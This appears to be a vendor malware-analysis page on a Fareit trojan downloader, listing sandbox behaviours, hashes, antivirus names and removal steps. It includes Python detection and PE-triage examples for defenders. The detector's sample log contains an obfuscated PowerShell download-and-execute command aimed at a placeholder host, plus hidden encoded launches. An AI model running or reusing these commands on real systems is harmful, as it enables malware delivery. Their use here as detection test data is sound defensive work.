TrojanDownloader:Win32/Fareit!MSR (file analysis)

TrojanDownloader:Win32/Fareit!MSR is flagged as malicious by the large majority of the antivirus engines listed below. While the infection is active, you may notice unfamiliar processes in the Task Manager list. In that case, scan your computer with GridinSoft Anti-Malware.

Removing PC viruses manually may take hours and may damage your PC in the process. We recommend using GridinSoft Anti-Malware for virus removal. The trial period allows you to run a complete scan and clean your PC.
6-day free trial available.

What can TrojanDownloader:Win32/Fareit!MSR do?

Behavioural signatures raised by the CAPE sandbox for this sample:

  • Behavioural detection: Executable code extraction – unpacking
  • A file was accessed within the Public folder.
  • CAPE extracted potentially suspicious content
  • Executed a very long command line or script command which may be indicative of chained commands or obfuscation
  • The binary likely contains encrypted or compressed data.
  • Authenticode signature is invalid
  • A scripting utility was executed
  • Uses Windows utilities for basic functionality
  • Appears to use command line obfuscation
  • A script or command line contains a long continuous string indicative of obfuscation
  • A powershell command using multiple variables was executed possibly indicative of obfuscation
  • Uses suspicious command line tools or Windows utilities
  • Yara rule detections observed from a process memory dump/dropped files/CAPE
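The signatures above describe behaviour rather than a file, so they map onto a process-creation detection. The following is an added example and is not part of the original report or of any vendor product: it scores constructed process-creation log lines against the utility-abuse and command-line obfuscation signals listed above. The log format (timestamp|pid|image|cmdline), the thresholds and the weights are assumptions chosen for this example.

```python
import base64
import re
from pathlib import PureWindowsPath

# Thresholds and weights are assumptions made for this example, not values from the sandbox report.
LONG_CMDLINE = 1000    # chars: "a very long command line"
LONG_TOKEN = 200       # chars: "a long continuous string indicative of obfuscation"
MANY_VARIABLES = 5     # distinct $names: "a powershell command using multiple variables"
SUSPICIOUS_SCORE = 3   # minimum total weight before an event is flagged

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
WINDOWS_UTILITIES = {"cmd.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
OBFUSCATION_MARKERS = ("[char]", "-join", "'+'", '"+"', "iex ", "invoke-expression")
VAR_RE = re.compile(r"\$(?:env:)?([A-Za-z_]\w*)")
ENCODED_FLAG_RE = re.compile(r"\s-e(?:nc|ncodedcommand)?\s")


def assess(image: str, cmdline: str) -> dict:
    """Score one process-creation event; each reason mirrors a signature from the list above."""
    exe = PureWindowsPath(image).name.lower()
    low = cmdline.lower()
    hits = []  # (reason, weight)

    if exe in SCRIPT_HOSTS:
        hits.append(("scripting utility executed", 1))
    elif exe in WINDOWS_UTILITIES:
        hits.append(("windows utility executed", 1))
    if len(cmdline) > LONG_CMDLINE:
        hits.append(("very long command line", 2))
    if any(len(token) > LONG_TOKEN for token in cmdline.split()):
        hits.append(("long continuous string", 2))
    if exe in ("powershell.exe", "pwsh.exe"):
        if len(set(VAR_RE.findall(cmdline))) >= MANY_VARIABLES:
            hits.append(("powershell command using multiple variables", 2))
        if ENCODED_FLAG_RE.search(low):
            hits.append(("encoded powershell command", 2))
    if (any(marker in low for marker in OBFUSCATION_MARKERS)
            or "`" in cmdline
            or (exe == "cmd.exe" and "^" in cmdline)):
        hits.append(("command line obfuscation markers", 2))
    if "\\users\\public\\" in low or "$env:public" in low:
        hits.append(("references the Public folder", 1))

    score = sum(weight for _, weight in hits)
    return {"score": score, "suspicious": score >= SUSPICIOUS_SCORE,
            "reasons": [reason for reason, _ in hits]}


def scan_log(lines) -> list:
    """Parse constructed 'timestamp|pid|image|cmdline' lines and assess each one."""
    results = []
    for line in lines:
        ts, pid, image, cmdline = line.rstrip("\n").split("|", 3)
        verdict = assess(image, cmdline)
        verdict.update({"time": ts, "pid": int(pid), "image": image})
        results.append(verdict)
    return results


# Constructed sample telemetry.  The URL host uses the reserved .invalid TLD and never resolves.
_ENCODED = base64.b64encode(("Write-Host 'constructed payload' " * 40).encode("utf-16le")).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOG = [
    r"2022-05-07T00:01:02Z|1180|C:\Windows\System32\cmd.exe|cmd.exe /c dir C:\Users\Public\Documents",
    "2022-05-07T00:01:12Z|4412|" + _PS + "|powershell.exe -NoP -W Hidden -c \"$a='http://';$b='update';"
    "$c='.invalid/';$d='x.exe';$u=$a+$b+$c+$d;$p=$env:PUBLIC+'\\x.exe';"
    "(New-Object Net.WebClient).DownloadFile($u,$p);Start-Process $p\"",
    "2022-05-07T00:01:30Z|4470|" + _PS + "|powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + _ENCODED,
    r"2022-05-07T00:02:05Z|4510|C:\Windows\System32\cmd.exe|cmd.exe /c p^o^w^e^r^s^h^e^l^l -nop -w hidden -c Start-Sleep",
]

if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{r['time']} pid={r['pid']} score={r['score']} {flag}: {', '.join(r['reasons']) or '-'}")
```

The thresholds are deliberately loose: a lone cmd.exe listing the Public folder scores 2 and is not flagged, while a PowerShell command that stitches a URL together from several variables and drops into the Public folder crosses the line, as do an encoded command and a caret-obfuscated cmd.exe launch. Tune the constants against your own telemetry before relying on this; the point is that each sandbox signature above reduces to a cheap string check over the command line.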

How to identify TrojanDownloader:Win32/Fareit!MSR?

File Info:

name: E49AA5579268D0E34F5B.mlw
path: /opt/CAPEv2/storage/binaries/a20a9f118a35d08803b47309887fc02247ed5a7e368298185c77cd99e9376f29
crc32: 91E44F68
md5: e49aa5579268d0e34f5bd32cde18e262
sha1: 0f20591c8ebe521e3f2a79fed0405020e2c6c3b6
sha256: a20a9f118a35d08803b47309887fc02247ed5a7e368298185c77cd99e9376f29
sha512: ba10a2a3c9117ff5aa30ad16e8d43ce00231bba051ee937d97bbc6fc5b99aa6141c2a6195b1f526db1d28a5c715120f3c4c75ba3303e99f8c42c91cccf2ab420
ssdeep: 192:/T33YrFJvL2MCVpYp3ieu5virqsDKkaVp+:/T33YrXLnC/sSeu5Krqa1w
type: PE32 executable (GUI) Intel 80386, for MS Windows
tlsh: T195428D0D6AE146F7F0F86BB5152FCB704462AC72C776632916C10E077C6C2ABAC1AB55
sha3_384: 448e3179aa3502605d8f43286bbba235b9baa3c651d863a3b92bdb5468ec72c01c08f9e3952f867820cdf866510e153f
ep_bytes: b8d89c40005064ff3500000000648925
timestamp: 2022-05-07 00:00:45

Version Info:

CompanyName: JetBrains s.r.o
LegalCopyright: Copyright ©2011-2021 JetBrains s.r.o. All rights reserved.
FileDescription: JetBrains ETW Collector Host
FileVersion: 211.15.21.0
ProductName: JetBrains ETW Collector
ProductVersion: 211.15.21.0
Translation: 0x0000 0x04b0
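A practitioner checking a file against this report wants three things: whether the hashes match the values above, when the binary was compiled, and whether it carries an Authenticode signature blob at all (the sandbox reports the signature as invalid). The following is an added example, not code from the original page or from any vendor tool: it reads those fields straight from the PE headers with the standard library and compares the hashes against the File Info section. The build_minimal_pe helper is an assumption for this example; it constructs a header-only PE32 as sample input because the real file is not included here.

```python
import hashlib
import struct
from datetime import datetime, timezone

# Hashes copied from the File Info section above (md5/sha1/sha256 only).
KNOWN_HASHES = {
    "md5": "e49aa5579268d0e34f5bd32cde18e262",
    "sha1": "0f20591c8ebe521e3f2a79fed0405020e2c6c3b6",
    "sha256": "a20a9f118a35d08803b47309887fc02247ed5a7e368298185c77cd99e9376f29",
}

IMAGE_DIRECTORY_ENTRY_SECURITY = 4  # data-directory slot that points at the Authenticode blob


def compute_hashes(data: bytes) -> dict:
    """md5/sha1/sha256 of the raw bytes, keyed like KNOWN_HASHES."""
    return {name: hashlib.new(name, data).hexdigest() for name in KNOWN_HASHES}


def match_known_hashes(data: bytes, known: dict = KNOWN_HASHES) -> bool:
    """True if any hash of `data` equals the corresponding known-bad value."""
    actual = compute_hashes(data)
    return any(actual.get(algo) == digest.lower() for algo, digest in known.items())


def parse_pe_header(data: bytes) -> dict:
    """Read machine, compile timestamp, entry point and the security directory straight
    from the PE headers (no third-party parser needed)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, _nsect, timestamp, _, _, _opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:        # PE32: NumberOfRvaAndSizes at +92, directories at +96
        ndirs_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:      # PE32+: +108 / +112 because ImageBase and stack/heap fields are 8 bytes
        ndirs_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
    sec_offset = sec_size = 0
    if ndirs > IMAGE_DIRECTORY_ENTRY_SECURITY:
        sec_offset, sec_size = struct.unpack_from("<II", data, dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    return {
        "machine": machine,                                   # 0x14C = Intel 80386, as in the File Info
        "is_pe32": magic == 0x10B,
        "timestamp": datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "entry_point_rva": struct.unpack_from("<I", data, opt + 16)[0],
        # The security directory holds a file offset, not an RVA; a non-zero size means a
        # WIN_CERTIFICATE blob is attached.  Whether that blob verifies is a separate question.
        "has_authenticode_blob": sec_size > 0,
        "authenticode_offset": sec_offset,
    }


def triage(data: bytes) -> dict:
    """One-shot check of a file against this report."""
    report = parse_pe_header(data)
    report["hashes"] = compute_hashes(data)
    report["matches_report"] = match_known_hashes(data)
    return report


def build_minimal_pe(timestamp: int, security_size: int = 0) -> bytes:
    """Constructed header-only PE32 used as sample input (not loadable, just enough for the parser)."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff_header = struct.pack("<HHIIIHH", 0x14C, 0, timestamp, 0, 0, 224, 0x0102)
    optional = struct.pack("<H", 0x10B) + b"\0" * 14 + struct.pack("<I", 0x1000)  # magic .. AddressOfEntryPoint
    optional += b"\0" * (92 - len(optional)) + struct.pack("<I", 16)              # NumberOfRvaAndSizes = 16
    directories = [(0, 0)] * 16
    directories[IMAGE_DIRECTORY_ENTRY_SECURITY] = (0x2000, security_size)
    optional += b"".join(struct.pack("<II", off, size) for off, size in directories)
    return dos_header + b"PE\0\0" + coff_header + optional


if __name__ == "__main__":
    import sys
    sample = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_pe(1651881645)
    for key, value in triage(sample).items():
        print(f"{key}: {value}")
```

Run it with a file path to triage a real binary; without arguments it parses the constructed header, whose timestamp is set to the 2022-05-07 00:00:45 value reported above. The security directory only tells you whether a signature blob is attached; whether it is valid needs a verifier such as Get-AuthenticodeSignature on Windows or osslsigncode verify elsewhere. Either way, version info naming JetBrains s.r.o. is not evidence of origin: those strings are free-form resource data that any build can set, and an invalid signature means the file does not chain to a trusted signing key. A well-known vendor name paired with a missing or bad signature is a triage signal in its own right.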

TrojanDownloader:Win32/Fareit!MSR also known as:

Bkav: W32.AIDetectMalware
Lionic: Trojan.Win32.Doris.4!c
Elastic: malicious (high confidence)
MicroWorld-eScan: Gen:Variant.Ser.Tedy.1886
ClamAV: Win.Downloader.Offer-9959756-0
FireEye: Gen:Variant.Ser.Tedy.1886
McAfee: RDN/Generic.dx
Cylance: unsafe
Zillya: Downloader.Convagent.Win32.1359
Sangfor: Downloader.Win32.Agent.Vdwe
Alibaba: Trojan:Win32/Generic.e167bc6e
Cybereason: malicious.79268d
BitDefenderTheta: Gen:NN.ZevbaF.36302.ai0faK2JhWk
Cyren: W32/VBKrypt.BHE.gen!Eldorado
Symantec: Trojan Horse
ESET-NOD32: a variant of Generik.FNPLHYY
APEX: Malicious
Cynet: Malicious (score: 100)
Kaspersky: Trojan-Downloader.Win32.Agent.xyahmt
BitDefender: Gen:Variant.Ser.Tedy.1886
Avast: Win32:Malware-gen
Tencent: Win32.Trojan-Downloader.Agent.Eflw
Sophos: Mal/Generic-S (PUA)
DrWeb: Trojan.Siggen17.57353
VIPRE: Gen:Variant.Ser.Tedy.1886
TrendMicro: TROJ_FRS.0NA103HV22
McAfee-GW-Edition: BehavesLike.Win32.MultiDropper.lm
Trapmine: malicious.high.ml.score
Emsisoft: Gen:Variant.Ser.Tedy.1886 (B)
GData: Gen:Variant.Ser.Tedy.1886
Jiangmin: TrojanDownloader.Agent.gciq
Webroot: W32.Malware.Gen
Antiy-AVL: Trojan/Win32.VB.gic
Arcabit: Trojan.Ser.Tedy.D75E
ViRobot: Trojan.Win.Z.Agent.12288.PM
ZoneAlarm: Trojan-Downloader.Win32.Agent.xyahmt
Microsoft: TrojanDownloader:Win32/Fareit!MSR
Google: Detected
AhnLab-V3: Malware/Win.Generic.C5143296
VBA32: BScope.Trojan.VB.01559
ALYac: Trojan.Downloader.Offer
MAX: malware (ai score=100)
Malwarebytes: Malware.AI.821152956
Panda: Trj/Chgt.AD
TrendMicro-HouseCall: TROJ_FRS.0NA103HV22
Rising: Downloader.Agent!8.B23 (CLOUD)
Ikarus: Trojan.Win32.VB
MaxSecure: Trojan.Malware.879860.susgen
Fortinet: W32/PossibleThreat
AVG: Win32:Malware-gen
DeepInstinct: MALICIOUS
CrowdStrike: win/malicious_confidence_100% (W)

How to remove TrojanDownloader:Win32/Fareit!MSR?

TrojanDownloader:Win32/Fareit!MSR removal tool
  • Download and install GridinSoft Anti-Malware.
  • Open GridinSoft Anti-Malware and perform a “Standard scan”.
  • “Move to quarantine” all items.
  • Open the “Tools” tab and press “Reset Browser Settings”.
  • Select the proper browser and options, then click “Reset”.
  • Restart your computer.

Because this sample is classified as a downloader, it may already have fetched and started additional payloads before it was removed. After the restart, run a second full scan so that anything it dropped is also found and quarantined.

About the author

Paul Valéry

I'm a cyber security analyst and data science expert with 5+ years of experience with security software contractors.
